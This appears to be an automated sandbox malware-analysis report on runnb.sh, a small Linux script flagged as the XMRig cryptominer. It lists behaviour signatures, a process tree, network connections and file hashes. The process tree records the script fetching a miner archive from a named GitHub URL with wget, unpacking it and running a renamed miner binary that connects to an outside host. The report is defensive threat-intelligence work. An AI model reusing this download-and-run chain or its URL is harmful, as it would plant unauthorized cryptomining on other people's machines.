Analysis

  • max time kernel
    1799s
  • max time network
    1792s
  • platform
    ubuntu-20.04_amd64
  • resource
    ubuntu2004-amd64-20240611-en
  • resource tags

    arch:amd64 arch:i386 image:ubuntu2004-amd64-20240611-en kernel:5.4.0-169-generic locale:en-us os:ubuntu-20.04-amd64 system
  • submitted
    30/10/2024, 08:21 UTC

General

  • Target

    runnb.sh

  • Size

    213B

  • MD5

    a1189543e2f98f6696c6d857b899ab0a

  • SHA1

    30b167128357a05cb5ae4d8bd386d63839d99c4d

  • SHA256

    a5951456684af2a46da1bcd8c820221c97b13a439db465c2b671fa3180d838d6

  • SHA512

    472e7cd110beb4c0ff9990763988190c875dccecc726753e295d4419413bfd14ed867a9a5977adf2d6e87d6e80f18abbdd0a929473f02bbfb24e1531e71d7aef

Malware Config

Signatures

  • Xmrig_linux family
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • Executes dropped EXE 1 IoCs
  • OS Credential Dumping 1 TTPs 1 IoCs

    Adversaries may attempt to dump credentials to use them in password cracking.

  • Abuse Elevation Control Mechanism: Sudo and Sudo Caching 1 TTPs 1 IoCs

    Abuse sudo or cached sudo credentials to execute code.

  • Checks hardware identifiers (DMI) 1 TTPs 4 IoCs

    Checks DMI information, which indicates whether the system is a virtual machine.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
  • Reads hardware information 1 TTPs 14 IoCs

    Accesses system info like serial numbers, manufacturer names etc.

  • Checks CPU configuration 1 TTPs 1 IoCs

    Checks CPU information, which indicates whether the system is a virtual machine.

  • Reads CPU attributes 1 TTPs 45 IoCs
  • Enumerates kernel/hardware configuration 1 TTPs 33 IoCs

    Reads contents of /sys virtual filesystem to enumerate system information.

  • Reads runtime system information 36 IoCs

    Reads data from /proc virtual filesystem.

  • Writes file to tmp directory 37 IoCs

    Malware often drops required files in the /tmp directory.

Processes

  • /tmp/runnb.sh
    /tmp/runnb.sh
    1⤵
    PID:1391
      • /usr/bin/sudo
        sudo apt install wget
        2⤵
        • OS Credential Dumping
        • Abuse Elevation Control Mechanism: Sudo and Sudo Caching
        • Reads runtime system information
        PID:1393
          • /usr/bin/apt
            apt install wget
            3⤵
            • Reads runtime system information
            • Writes file to tmp directory
            PID:1403
              • /usr/bin/dpkg
                /usr/bin/dpkg --print-foreign-architectures
                4⤵
                • Reads runtime system information
                PID:1404
              • /usr/bin/dpkg
                /usr/bin/dpkg --print-foreign-architectures
                4⤵
                • Reads runtime system information
                PID:1441
              • /bin/sh
                /bin/sh -c "[ ! -f /usr/bin/snap ] || /usr/bin/snap advise-snap --from-apt 2>/dev/null || true"
                4⤵
                PID:1442
                  • /usr/bin/snap
                    /usr/bin/snap advise-snap --from-apt
                    5⤵
                    • Enumerates kernel/hardware configuration
                    • Reads runtime system information
                    PID:1443
              • /bin/sh
                /bin/sh -c "[ ! -f /usr/bin/snap ] || /usr/bin/snap advise-snap --from-apt 2>/dev/null || true"
                4⤵
                PID:1448
                  • /usr/bin/snap
                    /usr/bin/snap advise-snap --from-apt
                    5⤵
                    • Enumerates kernel/hardware configuration
                    • Reads runtime system information
                    PID:1449
              • /bin/sh
                /bin/sh -c "[ ! -f /usr/bin/snap ] || /usr/bin/snap advise-snap --from-apt 2>/dev/null || true"
                4⤵
                PID:1454
                  • /usr/bin/snap
                    /usr/bin/snap advise-snap --from-apt
                    5⤵
                    • Enumerates kernel/hardware configuration
                    • Reads runtime system information
                    PID:1455
              • /bin/sh
                /bin/sh -c "[ ! -f /usr/bin/snap ] || /usr/bin/snap advise-snap --from-apt 2>/dev/null || true"
                4⤵
                PID:1460
                  • /usr/bin/snap
                    /usr/bin/snap advise-snap --from-apt
                    5⤵
                    • Enumerates kernel/hardware configuration
                    • Reads runtime system information
                    PID:1461
      • /usr/bin/apt
        apt install wget
        2⤵
        • Reads runtime system information
        • Writes file to tmp directory
        PID:1466
          • /usr/bin/dpkg
            /usr/bin/dpkg --print-foreign-architectures
            3⤵
            • Reads runtime system information
            PID:1467
          • /usr/bin/dpkg
            /usr/bin/dpkg --print-foreign-architectures
            3⤵
            • Reads runtime system information
            PID:1468
          • /bin/sh
            /bin/sh -c "[ ! -f /usr/bin/snap ] || /usr/bin/snap advise-snap --from-apt 2>/dev/null || true"
            3⤵
            PID:1469
              • /usr/bin/snap
                /usr/bin/snap advise-snap --from-apt
                4⤵
                • Enumerates kernel/hardware configuration
                • Reads runtime system information
                PID:1470
          • /bin/sh
            /bin/sh -c "[ ! -f /usr/bin/snap ] || /usr/bin/snap advise-snap --from-apt 2>/dev/null || true"
            3⤵
            PID:1475
              • /usr/bin/snap
                /usr/bin/snap advise-snap --from-apt
                4⤵
                • Enumerates kernel/hardware configuration
                • Reads runtime system information
                PID:1476
          • /bin/sh
            /bin/sh -c "[ ! -f /usr/bin/snap ] || /usr/bin/snap advise-snap --from-apt 2>/dev/null || true"
            3⤵
            PID:1481
              • /usr/bin/snap
                /usr/bin/snap advise-snap --from-apt
                4⤵
                • Enumerates kernel/hardware configuration
                • Reads runtime system information
                PID:1482
          • /bin/sh
            /bin/sh -c "[ ! -f /usr/bin/snap ] || /usr/bin/snap advise-snap --from-apt 2>/dev/null || true"
            3⤵
            PID:1487
              • /usr/bin/snap
                /usr/bin/snap advise-snap --from-apt
                4⤵
                • Enumerates kernel/hardware configuration
                • Reads runtime system information
                PID:1488
      • /usr/bin/wget
        wget https://github.com/orkaroeli/orkaroeliminer/raw/refs/heads/main/xmrigtar.tar.gz
        2⤵
        • Writes file to tmp directory
        PID:1493
      • /usr/bin/tar
        tar xvf xmrigtar.tar.gz
        2⤵
        • Reads runtime system information
        • Writes file to tmp directory
        PID:1494
          • /usr/local/sbin/gzip
            gzip -d
            3⤵
            PID:1495
          • /usr/local/bin/gzip
            gzip -d
            3⤵
            PID:1495
          • /usr/sbin/gzip
            gzip -d
            3⤵
            PID:1495
          • /usr/bin/gzip
            gzip -d
            3⤵
            PID:1495
      • /usr/bin/chmod
        2⤵
        PID:1496
      • /usr/bin/mv
        2⤵
        • Reads runtime system information
        PID:1497
      • /tmp/xmrig-6.22.0/cool
        2⤵
        • Executes dropped EXE
        • Checks hardware identifiers (DMI)
        • Reads hardware information
        • Checks CPU configuration
        • Reads CPU attributes
        • Enumerates kernel/hardware configuration
        • Reads runtime system information
        • Writes file to tmp directory
        PID:1498

Network

  • flag-us
    DNS
    github.com
    Remote address:
    1.1.1.1:53
    Request
    github.com
    IN A
    Response
    github.com
    IN A
    20.26.156.215
  • flag-us
    DNS
    github.com
    Remote address:
    1.1.1.1:53
    Request
    github.com
    IN AAAA
    Response
  • flag-us
    DNS
    raw.githubusercontent.com
    Remote address:
    1.1.1.1:53
    Request
    raw.githubusercontent.com
    IN A
    Response
    raw.githubusercontent.com
    IN A
    185.199.110.133
    raw.githubusercontent.com
    IN A
    185.199.109.133
    raw.githubusercontent.com
    IN A
    185.199.108.133
    raw.githubusercontent.com
    IN A
    185.199.111.133
  • flag-us
    DNS
    raw.githubusercontent.com
    Remote address:
    1.1.1.1:53
    Request
    raw.githubusercontent.com
    IN AAAA
    Response
    raw.githubusercontent.com
    IN AAAA
    2606:50c0:8002::154
    raw.githubusercontent.com
    IN AAAA
    2606:50c0:8003::154
    raw.githubusercontent.com
    IN AAAA
    2606:50c0:8001::154
    raw.githubusercontent.com
    IN AAAA
    2606:50c0:8000::154
  • flag-gb
    GET
    http://connectivity-check.ubuntu.com/
    Remote address:
    185.125.190.48:80
    Request
    GET / HTTP/1.1
    Host: connectivity-check.ubuntu.com
    Accept: */*
    Connection: close
    Response
    HTTP/1.1 204 No Content
    server: nginx/1.14.0 (Ubuntu)
    date: Wed, 30 Oct 2024 16:52:46 GMT
    x-cache-status: from content-cache-gs2/1
    x-networkmanager-status: online
    connection: close
  • flag-us
    GET
    http://connectivity-check.ubuntu.com/
    Remote address:
    91.189.91.98:80
    Request
    GET / HTTP/1.1
    Host: connectivity-check.ubuntu.com
    Accept: */*
    Connection: close
    Response
    HTTP/1.1 204 No Content
    server: nginx/1.18.0 (Ubuntu)
    date: Wed, 30 Oct 2024 16:57:46 GMT
    x-cache-status: from content-cache/2
    x-networkmanager-status: online
    connection: close
  • flag-us
    GET
    http://connectivity-check.ubuntu.com/
    Remote address:
    91.189.91.97:80
    Request
    GET / HTTP/1.1
    Host: connectivity-check.ubuntu.com
    Accept: */*
    Connection: close
    Response
    HTTP/1.1 204 No Content
    server: nginx/1.18.0 (Ubuntu)
    date: Wed, 30 Oct 2024 17:02:47 GMT
    x-cache-status: from content-cache/1
    x-networkmanager-status: online
    connection: close
                              • flag-us
                                DNS
                                connectivity-check.ubuntu.com
                                Remote address:
                                1.1.1.1:53
                                Request
                                connectivity-check.ubuntu.com
                                IN AAAA
                              • flag-us
                                DNS
                                connectivity-check.ubuntu.com
                                Remote address:
                                1.1.1.1:53
                                Request
                                connectivity-check.ubuntu.com
                                IN A
                              • flag-us
                                DNS
                                connectivity-check.ubuntu.com
                                Remote address:
                                1.1.1.1:53
                                Request
                                connectivity-check.ubuntu.com
                                IN A
                              • flag-us
                                GET
                                http://connectivity-check.ubuntu.com/
                                Remote address:
                                91.189.91.49:80
                                Request
                                GET / HTTP/1.1
                                Host: connectivity-check.ubuntu.com
                                Accept: */*
                                Connection: close
                                Response
                                HTTP/1.1 204 No Content
                                server: nginx/1.14.0 (Ubuntu)
                                date: Wed, 30 Oct 2024 17:08:02 GMT
                                x-cache-status: from content-cache-1ss/1
                                x-networkmanager-status: online
                                connection: close
                              • flag-us
                                DNS
                                connectivity-check.ubuntu.com
                                Remote address:
                                1.1.1.1:53
                                Request
                                connectivity-check.ubuntu.com
                                IN AAAA
                              • flag-us
                                DNS
                                connectivity-check.ubuntu.com
                                Remote address:
                                1.1.1.1:53
                                Request
                                connectivity-check.ubuntu.com
                                IN A
                              • flag-us
                                DNS
                                connectivity-check.ubuntu.com
                                Remote address:
                                1.1.1.1:53
                                Request
                                connectivity-check.ubuntu.com
                                IN A
                              • flag-gb
                                GET
                                http://connectivity-check.ubuntu.com/
                                Remote address:
                                185.125.190.49:80
                                Request
                                GET / HTTP/1.1
                                Host: connectivity-check.ubuntu.com
                                Accept: */*
                                Connection: close
                                Response
                                HTTP/1.1 204 No Content
                                server: nginx/1.14.0 (Ubuntu)
                                date: Wed, 30 Oct 2024 17:12:51 GMT
                                x-cache-status: from content-cache-gs2/0
                                x-networkmanager-status: online
                                connection: close
                              • flag-us
                                DNS
                                connectivity-check.ubuntu.com
                                Remote address:
                                1.1.1.1:53
                                Request
                                connectivity-check.ubuntu.com
                                IN AAAA
                              • flag-us
                                DNS
                                connectivity-check.ubuntu.com
                                Remote address:
                                1.1.1.1:53
                                Request
                                connectivity-check.ubuntu.com
                                IN AAAA
                              • flag-us
                                DNS
                                connectivity-check.ubuntu.com
                                Remote address:
                                1.1.1.1:53
                                Request
                                connectivity-check.ubuntu.com
                                IN A
                              • flag-us
                                GET
                                http://connectivity-check.ubuntu.com/
                                Remote address:
                                91.189.91.96:80
                                Request
                                GET / HTTP/1.1
                                Host: connectivity-check.ubuntu.com
                                Accept: */*
                                Connection: close
                                Response
                                HTTP/1.1 204 No Content
                                server: nginx/1.18.0 (Ubuntu)
                                date: Wed, 30 Oct 2024 17:17:46 GMT
                                x-cache-status: from content-cache/0
                                x-networkmanager-status: online
                                connection: close
                              • 20.26.156.215:443
                                github.com
                                tls
                                1.4kB
                                8.3kB
                                15
                                12
                              • 185.199.110.133:443
                                raw.githubusercontent.com
                                tls
                                23.3kB
                                3.7MB
                                394
                                2696
                              • 168.235.86.33:3393
                                28.0kB
                                30.4kB
                                220
                                148
                              • 185.125.190.48:80
                                http://connectivity-check.ubuntu.com/
                                http
                                355 B
                                405 B
                                5
                                4

                                HTTP Request

                                GET http://connectivity-check.ubuntu.com/

                                HTTP Response

                                204
                              • 91.189.91.98:80
                                http://connectivity-check.ubuntu.com/
                                http
                                407 B
                                401 B
                                6
                                4

                                HTTP Request

                                GET http://connectivity-check.ubuntu.com/

                                HTTP Response

                                204
                              • 91.189.91.97:80
                                http://connectivity-check.ubuntu.com/
                                http
                                467 B
                                401 B
                                7
                                4

                                HTTP Request

                                GET http://connectivity-check.ubuntu.com/

                                HTTP Response

                                204
                              • 91.189.91.49:80
                                http://connectivity-check.ubuntu.com/
                                http
                                494 B
                                405 B
                                6
                                4

                                HTTP Request

                                GET http://connectivity-check.ubuntu.com/

                                HTTP Response

                                204
                              • 185.125.190.49:80
                                http://connectivity-check.ubuntu.com/
                                http
                                355 B
                                405 B
                                5
                                4

                                HTTP Request

                                GET http://connectivity-check.ubuntu.com/

                                HTTP Response

                                204
                              • 91.189.91.96:80
                                http://connectivity-check.ubuntu.com/
                                http
                                355 B
                                401 B
                                5
                                4

                                HTTP Request

                                GET http://connectivity-check.ubuntu.com/

                                HTTP Response

                                204
                              • 224.0.0.251:5353
                                292 B
                                4
                              • 1.1.1.1:53
                                connectivity-check.ubuntu.com
                                dns
                                86 B
                                422 B
                                1
                                1

                                DNS Request

                                connectivity-check.ubuntu.com


                              • 1.1.1.1:53
                                github.com
                                dns
                                67 B
                                83 B
                                1
                                1

                                DNS Request

                                github.com

                                DNS Response

                                20.26.156.215

                              • 1.1.1.1:53
                                github.com
                                dns
                                67 B
                                151 B
                                1
                                1

                                DNS Request

                                github.com

                              • 1.1.1.1:53
                                raw.githubusercontent.com
                                dns
                                82 B
                                146 B
                                1
                                1

                                DNS Request

                                raw.githubusercontent.com

                                DNS Response

                                185.199.110.133
                                185.199.109.133
                                185.199.108.133
                                185.199.111.133

                              • 1.1.1.1:53
                                raw.githubusercontent.com
                                dns
                                82 B
                                194 B
                                1
                                1

                                DNS Request

                                raw.githubusercontent.com

                                DNS Response

                                2606:50c0:8002::154
                                2606:50c0:8003::154
                                2606:50c0:8001::154
                                2606:50c0:8000::154

                              • 1.1.1.1:53
                                connectivity-check.ubuntu.com
                                dns
                                86 B
                                422 B
                                1
                                1

                                DNS Request

                                connectivity-check.ubuntu.com


                              • 1.1.1.1:53
                                connectivity-check.ubuntu.com
                                dns
                                86 B
                                278 B
                                1
                                1

                                DNS Request

                                connectivity-check.ubuntu.com


                              • 1.1.1.1:53
                                connectivity-check.ubuntu.com
                                dns
                                86 B
                                422 B
                                1
                                1

                                DNS Request

                                connectivity-check.ubuntu.com


                              • 1.1.1.1:53
                                connectivity-check.ubuntu.com
                                dns
                                86 B
                                278 B
                                1
                                1

                                DNS Request

                                connectivity-check.ubuntu.com


                              • 1.1.1.1:53
                                connectivity-check.ubuntu.com
                                dns
                                86 B
                                422 B
                                1
                                1

                                DNS Request

                                connectivity-check.ubuntu.com


                              • 1.1.1.1:53
                                connectivity-check.ubuntu.com
                                dns
                                86 B
                                278 B
                                1
                                1

                                DNS Request

                                connectivity-check.ubuntu.com


                              • 1.1.1.1:53
                                connectivity-check.ubuntu.com
                                dns
                                86 B
                                422 B
                                1
                                1

                                DNS Request

                                connectivity-check.ubuntu.com


                              • 1.1.1.1:53
                                connectivity-check.ubuntu.com
                                dns
                                344 B
                                278 B
                                4
                                1

                                DNS Request

                                connectivity-check.ubuntu.com

                                DNS Request

                                connectivity-check.ubuntu.com

                                DNS Request

                                connectivity-check.ubuntu.com

                                DNS Request

                                connectivity-check.ubuntu.com


                              • 1.1.1.1:53
                                connectivity-check.ubuntu.com
                                dns
                                86 B
                                422 B
                                1
                                1

                                DNS Request

                                connectivity-check.ubuntu.com

                                DNS Response


                              • 1.1.1.1:53
                                connectivity-check.ubuntu.com
                                dns
                                172 B
                                278 B
                                2
                                1

                                DNS Request

                                connectivity-check.ubuntu.com

                                DNS Request

                                connectivity-check.ubuntu.com

                                DNS Response


                              • 1.1.1.1:53
                                connectivity-check.ubuntu.com
                                dns
                                258 B
                                422 B
                                3
                                1

                                DNS Request

                                connectivity-check.ubuntu.com

                                DNS Request

                                connectivity-check.ubuntu.com

                                DNS Request

                                connectivity-check.ubuntu.com

                                DNS Response


                              • 1.1.1.1:53
                                connectivity-check.ubuntu.com
                                dns
                                86 B
                                278 B
                                1
                                1

                                DNS Request

                                connectivity-check.ubuntu.com

                                DNS Response


                              MITRE ATT&CK Enterprise v15


                              Downloads

                              • /root/.wget-hsts

                                Filesize

                                215B

                                MD5

                                64dd8ac8db44b59dc79cf829a26da4ae

                                SHA1

                                9067d279506901dedab418197bcc3242c220a54d

                                SHA256

                                8a8ba4e594888a51410bdfdb1701ffbceeb1416ce0e711f5e775678ce028e53a

                                SHA512

                                3b84653e8130c81a34ba7061d9801c11726932bfd08abb35e01f2b3be1d21c8384bbb379e867733f85672a11dd2614dfafcbbcf4e8f8bad0eedefec4e9f3f8bb

                              • /tmp/clearsigned.message.8A9lOg

                                Filesize

                                257KB

                                MD5

                                f7baae962e2417343c0d68864dea6b69

                                SHA1

                                014599a6b6aff7497bc72d0f6ae30f7aa6383c1a

                                SHA256

                                52486e27d87061aa66607e1c03ab199be5658c67d4f166c20793ded09859bd6f

                                SHA512

                                fc0fca14d6752a81dfb433846e08ece181a51f72210126d935b6dde959aba36a04f5a92c2a0c2927c47e646807438f588b3f04f616ea34a10204baf54541bf23

                              • /tmp/xmrig-6.22.0/SHA256SUMS

                                Filesize

                                150B

                                MD5

                                19f1bb08cf8997837b1f738b76ca97e9

                                SHA1

                                c497499ad539d6ef580c6c932a2633fe820abded

                                SHA256

                                99ca11102d0994a98a76722b325f3215b30d3b3df3d722a2baebf6f9944566fa

                                SHA512

                                fbb742f0fa67720e798b493a5e5ba5e72cbdde3c0ea55cfc0704f93ab97c586434a3e029f6e1e3ed655da997649aa8e9caf352018b87457755f75ca1bfe50230

                              • /tmp/xmrig-6.22.0/config.json

                                Filesize

                                1KB

                                MD5

                                1879742a3f028a8e227f3b6b51756269

                                SHA1

                                20365c0cf35e787f525baede3646cfdfe6001cba

                                SHA256

                                4042908287a7c60eb515d2c180a03d25156b4001af6cba1ad823461cc86751c5

                                SHA512

                                e7d918532dd029a53b803df0df2e4e61416e18b58ffabe18b542cd30b111f266e98d73aad8ffe62a79af50e4f21d7e19415ee03ff104eb36aaad2cf1903e9731

                              • /tmp/xmrig-6.22.0/config.json

                                Filesize

                                919B

                                MD5

                                0a9b0011891eae4086d16c3364e772ff

                                SHA1

                                98fe8a7b5b6b0c0aa7635e4e388c67c863772b69

                                SHA256

                                1aa77bd6697d36e345cd7c0769613e9798106b0fed206d7f766e846b63aa10fd

                                SHA512

                                9e1791e92d71b539aac8f944a3db65708ebfca102f16e3e7af429aaea1446be781c4ec5cb740a163dbc11a3bdacfed36d21262e05fcf29d896beb06ce0d59554

                              • /tmp/xmrig-6.22.0/xmrig

                                Filesize

                                5.0MB

                                MD5

                                5da7e5b69532a31fcda3dfce36b83b55

                                SHA1

                                6ce87d5beff8d1a50a141671e35401a5b9bd3fdb

                                SHA256

                                6167bb33e19130878b1e3f6c092e6c94cd389856b1d137cb9066f0cea351930e

                                SHA512

                                efd069b8adfdec4f7adb0364cf8dc9a506ee1a5179e2f76b94210f6ca11562d21b7304ea6dbf1ae8f89114061c698093b3a887b844121e32fd3f4ccd33e6adab

                              • /tmp/xmrigtar.tar.gz

                                Filesize

                                3.4MB

                                MD5

                                ccdb2d76041e107dff38f962d65b3d4b

                                SHA1

                                e9360c43398f3725b0a3eb87e2448ac416d96be3

                                SHA256

                                11d52ee20c865f6b0b7787bfe7a06d7ce0d865e041552365b9a026a0d24cc18f

                                SHA512

                                f6b090c698cb1092bf10010bbe00fed0388e7117b8397cf3113a23271bb514d0d03b559de721896994b472f26f9e3aeeddc2877d71bcc7830313e97d2171033d
